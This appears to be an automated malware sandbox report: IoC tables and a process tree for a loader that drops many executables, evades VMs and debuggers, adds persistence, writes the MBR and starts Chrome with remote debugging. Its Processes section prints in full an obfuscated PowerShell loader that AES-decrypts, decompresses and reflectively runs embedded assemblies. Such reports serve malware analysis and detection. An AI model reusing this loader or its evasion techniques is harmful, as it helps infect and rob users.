description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 476 taskkill.exe 5412 taskkill.exe 1584 taskkill.exe 1640 taskkill.exe 4328 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133843750280608182" chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2100 schtasks.exe 5132 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3584 dfb3dd74837e1f931c4456bd18eb5a8d.exe 3584 dfb3dd74837e1f931c4456bd18eb5a8d.exe 3352 skotes.exe 3352 skotes.exe 1516 8bb20e8213.exe 1516 8bb20e8213.exe 1516 8bb20e8213.exe 1516 8bb20e8213.exe 4272 Bjkm5hE.exe 4272 Bjkm5hE.exe 4272 Bjkm5hE.exe 4272 Bjkm5hE.exe 4028 Fe36XBk.exe 4028 Fe36XBk.exe 5064 skotes.exe 5064 skotes.exe 4156 powershell.exe 4156 powershell.exe 1116 powershell.exe 1116 powershell.exe 3492 powershell.exe 3492 powershell.exe 3216 ViGgA8C.exe 3216 ViGgA8C.exe 3348 DTQCxXZ.exe 3348 DTQCxXZ.exe 3348 DTQCxXZ.exe 3348 DTQCxXZ.exe 3216 ViGgA8C.exe 3216 ViGgA8C.exe 4016 d2YQIJa.exe 4016 d2YQIJa.exe 4016 d2YQIJa.exe 4016 d2YQIJa.exe 4016 d2YQIJa.exe 4016 d2YQIJa.exe 2624 sHN20me.exe 2624 sHN20me.exe 2624 sHN20me.exe 2624 sHN20me.exe 2624 sHN20me.exe 2624 sHN20me.exe 2988 spoDnGT.exe 2988 spoDnGT.exe 2988 spoDnGT.exe 2988 spoDnGT.exe 2988 spoDnGT.exe 2988 spoDnGT.exe 688 Ta3ZyUR.exe 688 Ta3ZyUR.exe 688 Ta3ZyUR.exe 688 Ta3ZyUR.exe 2272 qFqSpAp.exe 2272 qFqSpAp.exe 2272 qFqSpAp.exe 2272 qFqSpAp.exe 4664 m5UP2Yj.exe 4664 m5UP2Yj.exe 4664 m5UP2Yj.exe 4664 m5UP2Yj.exe 4736 BitLockerToGo.exe 4736 BitLockerToGo.exe 4736 BitLockerToGo.exe 4736 BitLockerToGo.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 3492 powershell.exe Token: SeDebugPrivilege 3216 ViGgA8C.exe Token: SeShutdownPrivilege 2052 chrome.exe Token: SeCreatePagefilePrivilege 2052 chrome.exe Token: SeShutdownPrivilege 2052 chrome.exe Token: SeCreatePagefilePrivilege 2052 chrome.exe Token: SeShutdownPrivilege 2052 chrome.exe Token: SeCreatePagefilePrivilege 2052 chrome.exe Token: SeShutdownPrivilege 2052 chrome.exe Token: SeCreatePagefilePrivilege 2052 chrome.exe Token: SeShutdownPrivilege 2052 chrome.exe Token: SeCreatePagefilePrivilege 2052 chrome.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeShutdownPrivilege 2052 chrome.exe Token: SeCreatePagefilePrivilege 2052 chrome.exe Token: SeShutdownPrivilege 2052 chrome.exe Token: SeCreatePagefilePrivilege 2052 chrome.exe Token: SeDebugPrivilege 5400 powershell.exe Token: SeDebugPrivilege 5640 powershell.exe Token: SeDebugPrivilege 5152 Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Token: SeDebugPrivilege 5888 powershell.exe Token: SeDebugPrivilege 3948 powershell.exe Token: SeDebugPrivilege 5732 powershell.exe Token: SeDebugPrivilege 5580 powershell.exe Token: SeDebugPrivilege 5504 powershell.exe -
Suspicious use of FindShellTrayWindow 55 IoCs
pid Process 3584 dfb3dd74837e1f931c4456bd18eb5a8d.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 2052 chrome.exe 4076 97509cc0ad.exe 4076 97509cc0ad.exe 4076 97509cc0ad.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe 6012 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4076 97509cc0ad.exe 4076 97509cc0ad.exe 4076 97509cc0ad.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3348 setup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3584 wrote to memory of 3352 3584 dfb3dd74837e1f931c4456bd18eb5a8d.exe 85 PID 3584 wrote to memory of 3352 3584 dfb3dd74837e1f931c4456bd18eb5a8d.exe 85 PID 3584 wrote to memory of 3352 3584 dfb3dd74837e1f931c4456bd18eb5a8d.exe 85 PID 3352 wrote to memory of 2260 3352 skotes.exe 86 PID 3352 wrote to memory of 2260 3352 skotes.exe 86 PID 3352 wrote to memory of 2260 3352 skotes.exe 86 PID 2260 wrote to memory of 1516 2260 8bb20e8213.exe 88 PID 2260 wrote to memory of 1516 2260 8bb20e8213.exe 88 PID 2260 wrote to memory of 1516 2260 8bb20e8213.exe 88 PID 2260 wrote to memory of 1516 2260 8bb20e8213.exe 88 PID 2260 wrote to memory of 1516 2260 8bb20e8213.exe 88 PID 2260 wrote to memory of 1516 2260 8bb20e8213.exe 88 PID 2260 wrote to memory of 1516 2260 8bb20e8213.exe 88 PID 2260 wrote to memory of 1516 2260 8bb20e8213.exe 88 PID 2260 wrote to memory of 1516 2260 8bb20e8213.exe 88 PID 3352 wrote to memory of 1444 3352 skotes.exe 93 PID 3352 wrote to memory of 1444 3352 skotes.exe 93 PID 3352 wrote to memory of 1444 3352 skotes.exe 93 PID 3352 wrote to memory of 1440 3352 skotes.exe 94 PID 3352 wrote to memory of 1440 3352 skotes.exe 94 PID 3352 wrote to memory of 1440 3352 skotes.exe 94 PID 3352 wrote to memory of 4772 3352 skotes.exe 95 PID 3352 wrote to memory of 4772 3352 skotes.exe 95 PID 3352 wrote to memory of 4772 3352 skotes.exe 95 PID 4772 wrote to memory of 4272 4772 Bjkm5hE.exe 96 PID 4772 wrote to memory of 4272 4772 Bjkm5hE.exe 96 PID 4772 wrote to memory of 4272 4772 Bjkm5hE.exe 96 PID 4772 wrote to memory of 4272 4772 Bjkm5hE.exe 96 PID 4772 wrote to memory of 4272 4772 Bjkm5hE.exe 96 PID 4772 wrote to memory of 4272 4772 Bjkm5hE.exe 96 PID 4772 wrote to memory of 4272 4772 Bjkm5hE.exe 96 PID 4772 wrote to memory of 4272 4772 Bjkm5hE.exe 96 PID 4772 wrote to memory of 4272 4772 Bjkm5hE.exe 96 PID 3352 wrote to memory of 4028 3352 skotes.exe 100 PID 3352 wrote to memory of 4028 3352 skotes.exe 100 PID 3352 wrote to memory of 4028 3352 skotes.exe 100 PID 3352 wrote to memory of 4156 3352 skotes.exe 103 PID 3352 wrote to memory of 4156 3352 skotes.exe 103 PID 3352 wrote to memory of 4156 3352 skotes.exe 103 PID 4156 wrote to memory of 1516 4156 powershell.exe 105 PID 4156 wrote to memory of 1516 4156 powershell.exe 105 PID 4156 wrote to memory of 1516 4156 powershell.exe 105 PID 1516 wrote to memory of 3572 1516 cmd.exe 107 PID 1516 wrote to memory of 3572 1516 cmd.exe 107 PID 1516 wrote to memory of 3572 1516 cmd.exe 107 PID 1516 wrote to memory of 1116 1516 cmd.exe 108 PID 1516 wrote to memory of 1116 1516 cmd.exe 108 PID 1516 wrote to memory of 1116 1516 cmd.exe 108 PID 1116 wrote to memory of 3492 1116 powershell.exe 109 PID 1116 wrote to memory of 3492 1116 powershell.exe 109 PID 1116 wrote to memory of 3492 1116 powershell.exe 109 PID 3352 wrote to memory of 3216 3352 skotes.exe 110 PID 3352 wrote to memory of 3216 3352 skotes.exe 110 PID 3352 wrote to memory of 3216 3352 skotes.exe 110 PID 3352 wrote to memory of 3348 3352 skotes.exe 112 PID 3352 wrote to memory of 3348 3352 skotes.exe 112 PID 3352 wrote to memory of 3348 3352 skotes.exe 112 PID 1444 wrote to memory of 4704 1444 13Z5sqy.exe 113 PID 1444 wrote to memory of 4704 1444 13Z5sqy.exe 113 PID 1444 wrote to memory of 4704 1444 13Z5sqy.exe 113 PID 1444 wrote to memory of 4704 1444 13Z5sqy.exe 113 PID 1444 wrote to memory of 4704 1444 13Z5sqy.exe 113 PID 1444 wrote to memory of 4704 1444 13Z5sqy.exe 113 PID 1444 wrote to memory of 4704 1444 13Z5sqy.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\dfb3dd74837e1f931c4456bd18eb5a8d.exe"C:\Users\Admin\AppData\Local\Temp\dfb3dd74837e1f931c4456bd18eb5a8d.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Users\Admin\AppData\Local\Temp\1014060001\8bb20e8213.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\8bb20e8213.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Users\Admin\AppData\Local\Temp\1014060001\8bb20e8213.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\8bb20e8213.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 9564⤵
- Program crash
PID:3672
-
-
-
C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4704
-
-
-
C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1440
-
-
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 9684⤵
- Program crash
PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4028
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:3572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
-
C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3348
-
-
C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4448 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4736
-
-
-
C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2624
-
-
C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4908 -
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 9684⤵
- Program crash
PID:3224
-
-
-
C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4664 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 15124⤵
- Program crash
PID:2988
-
-
-
C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 9564⤵
- Program crash
PID:2916
-
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5076 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2052 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe8c5ccc40,0x7ffe8c5ccc4c,0x7ffe8c5ccc586⤵PID:4668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1896,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1892 /prefetch:26⤵PID:2756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1996,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2156 /prefetch:36⤵PID:3364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:86⤵PID:1996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:16⤵
- Uses browser remote debugging
PID:336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:16⤵
- Uses browser remote debugging
PID:2248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4112 /prefetch:16⤵
- Uses browser remote debugging
PID:4720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4524 /prefetch:86⤵PID:1548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4540 /prefetch:86⤵PID:2988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4824 /prefetch:86⤵PID:1640
-
-
